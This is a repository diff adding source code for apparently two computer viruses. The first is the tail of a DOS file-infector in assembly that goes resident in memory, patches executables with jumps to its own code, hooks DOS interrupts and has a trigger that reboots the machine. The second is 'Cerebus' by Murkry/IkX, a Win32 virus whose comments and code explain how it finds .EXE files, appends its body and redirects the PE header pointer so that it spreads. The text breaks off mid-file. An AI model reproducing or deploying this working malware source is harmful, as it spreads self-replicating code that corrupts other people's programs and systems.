loc_14 ; Jump if not equal + cmp ax,589h + jae loc_14 ; Jump if above or = + pop ax + pop dx + stc ; Set carry flag + ret +loc_14: + mov di,ax + mov bp,dx + pop cx + sub ax,cx + pop cx + sbb dx,cx + cmp word ptr [si+0Ch],0 + je loc_ret_17 ; Jump if equal + cmp dx,0 + jne loc_15 ; Jump if not equal + cmp ax,589h + jne loc_15 ; Jump if not equal + stc ; Set carry flag + ret +loc_15: + mov dx,bp + mov ax,di + push dx + push ax + add ax,589h + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + les di,dword ptr [si+2] ; Load 32 bit ptr + mov cs:data_29,di ; (701E:012D=0) + mov cs:data_30,es ; (701E:012F=0) + mov [si+2],dx + cmp dx,0 + je loc_16 ; Jump if equal + inc ax +loc_16: + mov [si+4],ax + pop ax + pop dx + call sub_2 + sub ax,[si+8] + les di,dword ptr [si+14h] ; Load 32 bit ptr + mov data_24,di ; (701E:0123=0C3C3h) + mov data_25,es ; (701E:0125=0C3C3h) + mov [si+14h],dx + mov [si+16h],ax + mov word ptr data_26,ax ; (701E:0127=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + call sub_3 + jc loc_ret_17 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + mov ah,40h ; '@' + mov dx,si + mov cx,18h + call sub_5 + +loc_ret_17: + ret +sub_1 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + mov cx,4 + mov di,ax + and di,0Fh + +locloop_18: + shr dx,1 ; Shift w/zeros fill + rcr ax,1 ; Rotate thru carry + loop locloop_18 ; Loop if cx > 0 + + mov dx,di + ret +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + mov ah,40h ; '@' + mov cx,589h + mov dx,100h + call sub_6 + jmp short loc_22 + db 90h + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_4: + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp ax,589h + jb loc_ret_21 ; Jump if below + cmp ax,0FA00h + jae loc_ret_21 ; Jump if above or = + push ax + cmp byte ptr [si],0E9h + jne loc_19 ; Jump if not equal + sub ax,58Ch + cmp ax,[si+1] + jne loc_19 ; Jump if not equal + pop ax + stc ; Set carry flag + ret +loc_19: + call sub_3 + jnc loc_20 ; Jump if carry=0 + pop ax + ret +loc_20: + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + pop ax + sub ax,3 + mov dx,123h + mov si,dx + mov byte ptr cs:[si],0E9h + mov cs:[si+1],ax + mov ah,40h ; '@' + mov cx,3 + call sub_5 + +loc_ret_21: + ret +sub_3 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_5 proc near +loc_22: + pushf ; Push flags + call cs:data_31 ; (701E:0131=0) + ret +sub_5 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_6 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr ds:data_7e ; (0000:0090=18Eh) Load 32 bit ptr + mov cs:data_32,ax ; (701E:0135=0) + mov cs:data_33,es ; (701E:0137=0) + mov ax,3ABh + mov ds:data_7e,ax ; (0000:0090=18Eh) + mov ds:data_8e,cs ; (0000:0092=1498h) + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_35,ax ; (701E:013D=0) + mov cs:data_36,es ; (701E:013F=0) + les ax,cs:data_34 ; (701E:0139=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_6 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_7 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr cs:data_32 ; (701E:0135=0) Load 32 bit ptr + mov ds:data_7e,ax ; (0000:0090=18Eh) + mov ds:data_8e,es ; (0000:0092=1498h) + les ax,dword ptr cs:data_35 ; (701E:013D=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_7 endp + + db 0B0h, 3, 0CFh, 50h, 53h, 51h + db 2Eh, 0A3h, 0FEh, 3, 2Eh, 0A1h + db 0F7h, 3, 0A3h, 50h, 4, 2Eh + db 0A1h, 0F5h, 3, 8Ah, 0DCh, 0B4h + db 9, 0B9h, 1, 0, 0CDh, 10h + db 0E8h, 34h, 0, 0E8h, 0B7h, 0 + db 2Eh, 0A1h, 0F7h, 3, 0A3h, 50h + db 4, 0B3h, 7, 0B8h, 7, 9 + db 0B9h, 1, 0, 0CDh, 10h, 2Eh + db 0A1h, 0FEh, 3, 0A3h, 50h, 4 + db 7, 1Fh + db ']_^ZY[X.' + db 0FFh, 2Eh, 0FAh, 3 +data_37 dw 0 +data_38 db 10h +data_39 db 10h +data_40 db 0 +data_41 dw 0 +data_42 dw 0 + db 0, 0, 2Eh, 0A1h, 0F7h, 3 + db 8Bh, 1Eh, 4Ah, 4, 4Bh, 2Eh + db 0F6h, 6, 0F9h, 3, 1, 74h + db 0Ch, 3Ah, 0C3h, 72h, 12h, 2Eh + db 80h, 36h, 0F9h, 3, 1, 0EBh + db 0Ah +loc_23: + cmp al,0 + jg loc_24 ; Jump if > + xor byte ptr cs:data_40,1 ; (701E:03F9=0) +loc_24: + test byte ptr cs:data_40,2 ; (701E:03F9=0) + jz loc_25 ; Jump if zero + cmp ah,18h + jb loc_26 ; Jump if below + xor byte ptr cs:data_40,2 ; (701E:03F9=0) + jmp short loc_26 +loc_25: + cmp ah,0 + jg loc_26 ; Jump if > + xor byte ptr cs:data_40,2 ; (701E:03F9=0) +loc_26: + cmp byte ptr cs:data_37,20h ; (701E:03F5=0) ' ' + je loc_27 ; Jump if equal + db 2Eh +data_44 dw 3E80h + db 0F8h, 3, 0, 74h, 6, 2Eh + db 80h, 36h, 0F9h, 3, 2 +loc_27: + test byte ptr cs:data_40,1 ; (701E:03F9=0) + jz loc_28 ; Jump if zero + inc cs:data_38 ; (701E:03F7=10h) + jmp short loc_29 +loc_28: + dec cs:data_38 ; (701E:03F7=10h) +loc_29: + test byte ptr cs:data_40,2 ; (701E:03F9=0) + jz loc_30 ; Jump if zero + inc cs:data_39 ; (701E:03F8=10h) + jmp short loc_ret_31 +loc_30: + dec cs:data_39 ; (701E:03F8=10h) + +loc_ret_31: + ret + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + mov ax,word ptr cs:data_38 ; (701E:03F7=1010h) + mov ds:data_11e,ax ; (0000:0450=184Fh) + mov bh,data_55 ; (0000:0462=0D400h) + mov ah,8 + int 10h ; Video display ah=functn 08h + ; get char al & attrib ah @curs + mov cs:data_37,ax ; (701E:03F5=0) + ret +sub_8 endp + + db 50h, 53h, 51h, 52h, 56h, 57h + db 55h, 1Eh, 6, 33h, 0C0h, 50h + db 1Fh, 81h, 3Eh, 70h, 0, 0AEh + db 3, 74h, 35h, 0A1h, 6Ch, 4 + db 8Bh, 16h, 6Eh, 4, 0B9h, 0FFh + db 0FFh, 0F7h, 0F1h, 3Dh, 10h, 0 + db 75h, 24h, 0FAh, 8Bh, 2Eh, 50h + db 4, 0E8h, 0BEh, 0FFh, 89h, 2Eh + db 50h, 4, 0C4h, 6, 70h, 0 + db 2Eh, 0A3h, 0FAh, 3, 2Eh, 8Ch + db 6, 0FCh, 3, 0C7h, 6, 70h + db 0, 0AEh, 3, 8Ch, 0Eh, 72h + db 0, 0FBh +loc_32: + mov ah,2 + int 14h ; RS-232 dx=com1, ah=func 02h + ; get char al, ah=return status + cmp al,31h ; '1' + je loc_33 ; Jump if equal + jnz loc_34 ; Jump if not zero +loc_33: + int 19h ; Bootstrap loader +loc_34: + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + ret + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_9 proc near + mov dx,10h + mul dx ; dx:ax = reg * ax + ret +sub_9 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_10 proc near + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + xor bp,bp ; Zero register + ret +sub_10 endp + + db 1Eh, 0E8h, 0, 0 + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_11 proc near + mov ax,4B4Dh + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + jc loc_35 ; Jump if carry Set + jmp loc_45 +loc_35: + pop si + push si + mov di,si + xor ax,ax ; Zero register + push ax + pop ds + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_53e[si],ax ; (701E:FC26=0) + mov cs:data_54e[si],es ; (701E:FC28=0) + les bx,dword ptr ds:data_5e ; (0000:0084=6E3h) Load 32 bit ptr + mov cs:data_51e[di],bx ; (701E:FC1E=0) + mov cs:data_52e[di],es ; (701E:FC20=0) + mov ax,ds:data_9e ; (0000:0102=0CC00h) + cmp ax,0F000h + jne loc_43 ; Jump if not equal + mov dl,80h + mov ax,ds:data_10e ; (0000:0106=326h) + cmp ax,0F000h + je loc_36 ; Jump if equal + cmp ah,0C8h + jb loc_43 ; Jump if below + cmp ah,0F4h + jae loc_43 ; Jump if above or = + test al,7Fh + jnz loc_43 ; Jump if not zero + mov ds,ax + cmp word ptr ds:data_15e,0AA55h ; (0326:0000=6A7h) + jne loc_43 ; Jump if not equal + mov dl,ds:data_16e ; (0326:0002=70h) +loc_36: + mov ds,ax + xor dh,dh ; Zero register + mov cl,9 + shl dx,cl ; Shift w/zeros fill + mov cx,dx + xor si,si ; Zero register + +locloop_37: + lodsw ; String [si] to ax + cmp ax,0FA80h + jne loc_38 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7380h + je loc_39 ; Jump if equal + jnz loc_40 ; Jump if not zero +loc_38: + cmp ax,0C2F6h + jne loc_41 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7580h + jne loc_40 ; Jump if not equal +loc_39: + inc si + lodsw ; String [si] to ax + cmp ax,40CDh + je loc_42 ; Jump if equal + sub si,3 +loc_40: + dec si + dec si +loc_41: + dec si + loop locloop_37 ; Loop if cx > 0 + + jmp short loc_43 +loc_42: + sub si,7 + mov cs:data_53e[di],si ; (701E:FC26=0) + mov cs:data_54e[di],ds ; (701E:FC28=0) +loc_43: + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + mov es,bx + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + sub bx,5Ah + nop + jc loc_45 ; Jump if carry Set + mov cx,es + stc ; Set carry flag + adc cx,bx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,59h + stc ; Set carry flag + sbb es:data_19e,bx ; (06E3:0002=2342h) + push es + mov es,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ax,es + dec ax + mov ds,ax + mov word ptr ds:data_18e,8 ; (0688:0001=0FF17h) + call sub_9 + mov bx,ax + mov cx,dx + pop ds + mov ax,ds + call sub_9 + add ax,ds:data_20e ; (06E3:0006=2344h) + adc dx,0 + sub ax,bx + sbb dx,cx + jc loc_44 ; Jump if carry Set + sub ds:data_20e,ax ; (06E3:0006=2344h) +loc_44: + mov si,di + xor di,di ; Zero register + push cs + pop ds + sub si,413h + mov cx,589h + inc cx + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + dec bx + mov ds,bx + mov byte ptr ds:data_17e,5Ah ; (0687:0000=81h) 'Z' + mov dx,142h + xor ax,ax ; Zero register + push ax + pop ds + mov ax,es + sub ax,10h + mov es,ax + cli ; Disable interrupts + mov ds:data_5e,dx ; (0000:0084=6E3h) + mov ds:data_6e,es ; (0000:0086=161Ah) + sti ; Enable interrupts + dec byte ptr ds:data_14e ; (0000:047B=0) +loc_45: + pop si + cmp word ptr cs:data_46e[si],5A4Dh ; (701E:FBF0=0) + jne loc_46 ; Jump if not equal + pop ds + mov ax,cs:data_50e[si] ; (701E:FC14=0) + mov bx,cs:data_49e[si] ; (701E:FC12=0) + push cs + pop cx + sub cx,ax + add cx,bx + push cx + push word ptr cs:data_48e[si] ; (701E:FC10=0) + push ds + pop es + call sub_10 + ret ; Return far +loc_46: + pop ax + mov ax,cs:data_46e[si] ; (701E:FBF0=0) + mov cs:data_21,ax ; (701E:0100=0CE9h) + mov ax,cs:data_47e[si] ; (701E:FBF2=0) + mov cs:data_22,ax ; (701E:0102=0C304h) + mov ax,100h + push ax + push cs + pop ds + push ds + pop es + call sub_10 + ret +sub_11 endp + + +code_seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cerebus.asm b/MSDOS/Virus.MSDOS.Unknown.cerebus.asm new file mode 100644 index 00000000..1f86f233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cerebus.asm @@ -0,0 +1,703 @@ +; +; Cerebrus, by Murkry/IkX +; +; +; +; this virus is a beta test of an idea I have heard and read about, +; but had never tried. What it does is append its own code to the end of the +; host file and then alter the NEW HEADER pointer at 3ch to point to itself. +; While this virus does work, because of a few mistakes I made the infected +; file will not have any icons associated with it. There are several ways +; around this. But my next attempt at one of these would actualy be larger +; I would just copy the virus in memory to the end of the host. This way I +; would not need to write the internal info and would let Win95 handle it all. +; I actual code the Import data table into the virus this is for size +; consideration . While I still like the idea for this virus the main reason +; I wanted to try it was to try out some code I read about that would mark a +; file as Erase on CLose (or something like that). It describes a self erasing +; file like maybe a Setup program runs once never again. But the idea seems +; like it would only work in NT not 95 at least in my tests. +; Another thing I found was that while MS pushes us to use the Win32 +; CreateProc.. and not WinExec. CreateP will only run PE files while WinExec +; will run dos/NE/PE files. So someone could write this so that it infect all +; those files but would only spread under Win95, in DOS the orginal Dos program +; would be called, In 3.11 you would see the dos error msg, and in Win95 all +; the programs would infect and run ok. +; In testing this virus works well 'cept for a few little things, like other +; virus that modify the New Header offset it will make the icons vanish since +; the .rscr section is now "lost". A second thing I believe (know) is that +; since I use an internal .idata structure and I only have one of the pntrs to +; the API in it, yet after the first Generation this pntr is overwritten with +; the address of the API call itself. Actually I am sorta surprised this did +; not cause an error, I guess in Win95 it thinks its bound already and leaves +; it alone. Hmm some of you know what I mean others, I sure are lost, ;) sorry. +; Anyway you can fix this in two ways, one easier than the other depending on +; who you talk to. 1 keep the other refrence to the api name, 2 have a routine +; that fixes this before you write the virus to another host. +; Anyway, despite the problems with this version of the virus I beleive that +; this method with some changes could be very viable in the Win32 enviroment. +; +; To compile use the mk.bat file. +; +; The other file 1.inc is just some header info I used after I finished this +; virus I realize I really did not need to do all that work, but for those of +; you who are curios about the PE header examine away. + +; Murkry + + +.386 +.model flat, stdcall +True equ 1 +False equ 0 +GENERIC_READ equ 80000000h +GENERIC_WRITE equ 40000000h +FATTR_NORMAL equ 0 +OPEN_EXISTING equ 3 + +;File is setup so that there will be 2 PE headers we use debug or +; some tool to set the MZ 3ch to point to our second PE header +; then when run the PE part could be append to the other PE files +; and infect in that matter the only parts that need to be alter +; in the section header +; Pter to Raw Data + +LoadAT equ 01000h +offs equ offset PEheader ;+ LoadAT + 400000h + +; - offset PEheader + LoadAT + 400000h +;Define the needed external functions and constants here. + +extrn ExitProcess:PROC +extrn MessageBoxA:PROC + +extrn CreateProcessA:PROC +.data ;the data area +dummy dd ? ;tasm needs some data or it won't work! + +.code ;executable code starts here +include 1.inc + +CodeSect db 'CODE',0,0,0,0 +CodeVSize dd 0000e000h ; +CodeVAddr dd LoadAT ; +CodeSzRawData dd 00000800h ; +CodePtrRwData dd 00000600h ;where the code for this section is + dd 00000000h + dd 00000000h + dw 0000h + dw 0000h +CodeChar dd 0A0000060h ;6000 0020 + + +RescSect db '.rsrc',0,0,0 + dd 00002000H ; + dd 0E000h;LoadAT + 0e000h ; + dd 00001600h ; + dd 00000200h ;where the code for this section is + dd 00000000h + dd 00000000h + dw 00h + dw 00h + db 40h,00,00,40h + + + dd 0000h +CDseg: +IDATA: + DD 0 ; usual this has a redunat entry + ;We are skipping it + ; offset API_LOC1 - offset PEheader + LoadAT + + dd 0 ;time date stamp + dd 0 ;where in memory this dll is loaded + + DD offset DLL1 - offset PEheader + LoadAT + + DD offset API_LOC2 - offset PEheader + LoadAT + + DD 0 ; usual this has a redunt entry + ;We are skipping it + ; offset API_LOC1 - offset PEheader + LoadAT + + dd 0 ;time date stamp + dd 0 ;where in memory this dll is loaded + + DD offset DLLA - offset PEheader + LoadAT + + DD offset API_LOC2A - offset PEheader + LoadAT + DD 00000000H + + + DB 10H DUP(0) + + +API_LOC2 DD offset FUNC1 - offset PEheader + LoadAT ; +beep DD offset FUNC2 - offset PEheader + LoadAT ;4h +VxdCall0 DD 80000001h ;8h +getcomline DD offset FUNC3 - offset PEheader + LoadAT ;Ch +createp DD offset FUNC4 - offset PEheader + LoadAT ;10h +Copy DD offset FUNC5 - offset PEheader + LoadAT +Create DD offset FUNC6 - offset PEheader + LoadAT +FileP DD offset FUNC7 - offset PEheader + LoadAT +Read DD offset FUNC8 - offset PEheader + LoadAT +Write DD offset FUNC9 - offset PEheader + LoadAT +Close DD offset FUNC10 - offset PEheader + LoadAT +FindFirst DD offset FUNC11 - offset PEheader + LoadAT +FindNext DD offset FUNC12 - offset PEheader + LoadAT +CloseFind DD offset FUNC13 - offset PEheader + LoadAT +FileSize DD offset FUNC14 - offset PEheader + LoadAT +WinEx DD offset FUNC15 - offset PEheader + LoadAT + DD 0 +MsgBox: +API_LOC2A DD offset FUNCA - offset PEheader + LoadAT + + DD 0 + +DLL1 DB 'KERNEL32.dll',0 +DLLA DB 'USER32',0 + + dw 0 ;ends dll names + +FUNC1 dw 0 + db 'ExitProcess',0 + +FUNC2 dw 0 + DB 'Beep',0 + +FUNC3 dw 0 + DB 'GetCommandLineA',0 + +FUNC4 dw 0 + db 'CreateProcessA',0 + +FUNC5 dw 0 + db 'CopyFileA',0 + +FUNC6 dw 0 + db 'CreateFileA',0 + +FUNC7 dw 0 + db 'SetFilePointer',0 + +FUNC8 dw 0 + db 'ReadFile',0 + +FUNC9 dw 0 + db 'WriteFile',0 + +FUNC10 dw 0 + db 'CloseHandle',0 + +FUNC11 dw 0 + db 'FindFirstFileA',0 + +FUNC12 dw 0 + db 'FindNextFileA',0 + +FUNC13 dw 0 + db 'FindClose',0 + +FUNC14 dw 0 + db 'GetFileSize',0 + +FUNC15 dw 0 + db 'WinExec',0 + + + db 0 ;end of Function list for this DLL + + +FUNCA dw 0 + db 'MessageBoxA',0 + dw 0 + + db 0 ;end the function list + db 0 ;end the DLL list + + +EndIDATA: + +Begin: + + Call Beep + + +;------------------------------------------------------------- + ;this API returns the call with " " so we now move this name only + ;to our buffer excluding the " " and adding the 0 at the end + + call dword ptr [getcomline] + + xchg esi,eax + inc esi + mov edi,offset filename + push edi ;save pointer to the orginal filename + +GetLoop: + lodsb + cmp al,'"' + je AllDone + stosb + jmp GetLoop + +AllDone: + xor eax,eax + stosb + +;get the command line in case we need it + mov edi, offset pCommandLine +GetLine: + lodsb + stosb + cmp al,0 + jne GetLine + +;------------------------------------------------------------- +;Now make the file name into something we can use + pop esi ;pnter to the current file name + push esi + mov Edi,offset tempfile + +TempFile: + lodsb + stosb + cmp al,'.' + jne TempFile + xor eax,eax + ;MOV EAX,004D4F43H ;00'MOC' + mov eax, 00455645h ;00'EVE' + stosd +;------------------------------------------------------------- + pop edi ;the host file + +;-------------------------------------------------------------- +;Copy the file to another name + Call dword ptr [offset Copy] , edi, offset tempfile ,large False + or eax,eax + jz ErrorFile +;-------------------------------------------------------------- +;Open the File r/w using Create file + +Call dword ptr [Create] , offset tempfile, GENERIC_READ or GENERIC_WRITE, \ + large 0, large 0, large OPEN_EXISTING, large 0,large 0 + + mov dword ptr [fHandle],eax + +;-------------------------------------------------------------- +;Move Pointer to the 3ch and fix the pointer to old PE file + Call dword ptr [FileP] , [fHandle], large 3ch, large 0, large 0 + +;for debuggin +; pusha +; mov edi,dword ptr [OldOff] +; call ConvertIt +; Call dword ptr [MsgBox] , large 0, offset tempfile , offset numb +; ,large 1 +; popa +;end for debuggin + + +;-------------------------------------------------------------- +;Write to the file using Write + Call dword ptr [Write], [fHandle],offset OldOff,large 4, \ + offset NumRead, large 0 + +;-------------------------------------------------------------- +;Close the file + Call dword ptr[Close],[fHandle] + +;-------------------------------------------------------------- +;Run the file using CreateProcess + Call dword ptr [createp], \ + offset tempfile, \ ;module name + offset blank, \ ;command line + large 0, \ ;sec attr + large 0, \ ;thread sec + Large False, \ ;inherit handles + large 0, \ ;create flags + large 0, \ ;Enviroment + large 0, \ ;current directory + offset StartupInfo, \ ;startup info + offset ProcessInfo \ ;process info + + +;--------------------------------------------------------------------------- +;Run the file using Winexec +; Call dword ptr [WinEx], offset tempfile, large 1 +; +; Call dword ptr[Close],EAX +;--------------------------------------------------------------------------- +;Now try to infect a new file +;1 find file +;2 open the file +;3 make sure its a even 200h boundary alter if needed +;4 modifiy the ptr to raw data in the .Code section +; write the new end to the file +;5 goto top of file then modify 3ch offset to point to the new location +; +;--------------------------------------------------------------- +;1 First find a file + + Call dword ptr [FindFirst], offset NewHost, offset FindData + cmp eax,-1 + je ErrorFile + + mov dword ptr [hfindFile] ,Eax + + jmp GotOne + +CloseFileTry: + Call dword ptr[Close],[fHandle] + +tryfornext: + Call dword ptr [FindNext], [hfindFile], offset FindData + or eax,eax + jnz GotOne + + Call dword ptr[CloseFind],[hfindFile] + jmp ErrorFile + +GotOne: +;--------------------------------------------------------------- +;Open the File r/w using Create file + +Call dword ptr [Create] , offset fName, GENERIC_READ or GENERIC_WRITE, \ + large 0, large 0, large OPEN_EXISTING, large 0,large 0 + + mov dword ptr [fHandle],eax + + cmp eax,-1 + je tryfornext +;--------------------------------------------------------------- +;Get the file size and figure if we need to round it up to a 200h offset +; + call dword ptr [FileSize] , [fHandle],large 0 + cmp eax,-1 + je CloseFileTry + + mov dword ptr[SizeOfFile],eax + dec eax + mov ecx,200h + add eax,ecx + + XOR EDX,EDX + div ecx + mul ecx + mov [CodePtrRwData],eax ;holds the new file size + +;-------------------------------------------------------------- +;Read from the + Call dword ptr [Read] , \ + [fHandle], \ ;handle + offset buffer, \ ;where to read to + 100h, \ ;how much to read + offset NumRead, \ ;how much was read + large 0 ;overlapped amount not used win95 + + or eax,eax + jz CloseFileTry + + + mov ebx,offset buffer + cmp word ptr[ebx],'ZM' + jne CloseFileTry ;Get next file + + + cmp dword ptr [ebx + 3ch],0 + je CloseFileTry + + cmp dword ptr [ebx + 3ch],100h + jg CloseFileTry + + mov eax,dword ptr[ebx + 3ch] + mov dword ptr [OldOff],eax + + +;-------------------------------------------------------------- +;Move Pointer to the endf of the file + Call dword ptr [FileP] , [fHandle], large 0, large 0, large 2 + ; file end +;-------------------------------------------------------------- +;Get how many bytes to add to the file + + mov eax,dword ptr [CodePtrRwData] ; holds what the new file size + sub eax,dword ptr [SizeOfFile] + +;-------------------------------------------------------------- +;Write that many bytes to the end of the file +;Write to the file using Write + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset OldOff, \ ;where to write from + eax, \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + +;-------------------------------------------------------------- +;Write to the file using Write + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset PEheader, \ ;where to write from + OFFSET filename - offset PEheader, \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + + +;-------------------------------------------------------------- +;Move Pointer to the TOPF of the file + Call dword ptr [FileP] , [fHandle], large 3ch, large 0, large 0 +;-------------------------------------------------------------- +;Write the new offset at 3ch + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset CodePtrRwData, \ ;where to write from + large 4 , \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + +;-------------------------------------------------------------- +;close the file + Call dword ptr[Close],[fHandle] + +;--------------------------------------------------------------------------- + +;Call dword ptr [MsgBox] , large 0,offset tempfile, offset filename ,large 1 + +ErrorFile: + +K32ExitP: + Call dword ptr ds:[offset API_LOC2 ] ,-1 + + +;-------------------------------------------------------- +Beep: + call dword ptr ds:[offset beep ] ,eax,eax + + ret + +;===================================================================== +;ConvertIt takes a number in Edi and Converts it to Readable and Stores it +; in the location Pointed at by Esi +; +;Input +;Edi What number we want to convert to hexdecial readable +;Esi Where it will be placed When Done +; +; + +ConvertIt: + mov esi,offset numb + PushA + + push Edi + xchg Edi,Esi + mov cx,1ch + + +digit_loop: + pop Eax + push Eax + + shr Eax,Cl + and ax,000fh + sub cx,4 + cmp al,9 + jle number + + sub al,0ah + add al,41h + jmp letter + +number: + or al,30h +letter: + stosb + cmp cx,0fffCh + jne digit_loop + mov al,0 + stosb + + pop edi + + + PopA + + Ret +;=================================================================== +MURK DB 'MURKRY/IkX',0 +VIRII DB 'CEREBRUS',0 +info DB 'The three head guardian, is in your computer, fear no more',0 + +numb dd ? + +blank db ' ',0 +OldOff dd 100h + +NewHost db '*.EXE',0 +victim db 'Notepad.exe',0 ;in real virus this would be in the + ;find file info +filename db 256D dup (?) +tempfile db 256D dup (?) +hfindFile dd ? ; +fHandle dd ? +NumRead dd ? +pCommandLine db 256D DUP(?) + +FindData: +fileattr dd ? ; DWORD dwFileAttributes; ;00 00 00 00 +fCreat dd 2 dup(?) ; FILETIME ftCreationTime; ;DD ?,? ; +fAccess dd 2 dup(?) ; FILETIME ftLastAccessTime; ;DD ?,? ; +fWrite dd 2 dup(?) ; FILETIME ftLastWriteTime; ;DD ?,? ; +fsizelow dd ? ; DWORD nFileSizeHigh; ; +fsizehigh dd ? ; DWORD nFileSizeLow; ; +fresv1 dd ? ; DWORD dwReserved0; ; +fresv2 dd ? ; DWORD dwReserved1; ; +fName db 255d dup(?) ; CHAR cFileName[MAX_PATH]; 255B ; +fdosname db 14d dup(?) ; CHAR cAlternateFileName[ 14 ]; ; + +SizeOfFile dw ? +FleHdle dd ? +ProcessInfo dd 4h dup(?) +StartupInfo dd 18h dup(?) +buffer db ? + + +;------------- +ttle db 'Hello',0 +msg db 'from host',0 + +CodeEnds: + + + Call MessageBoxA, large 0, offset ttle, offset msg, large 1 + push -1 + Call ExitProcess + end CodeEnds + + +;哪腫1.INC]哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +;1.inc +PEheader db 'PE',0,0 ;200 +Machine dw 014ch +NumSect dw 0002h ;Seems Win95 does check this but if + ; 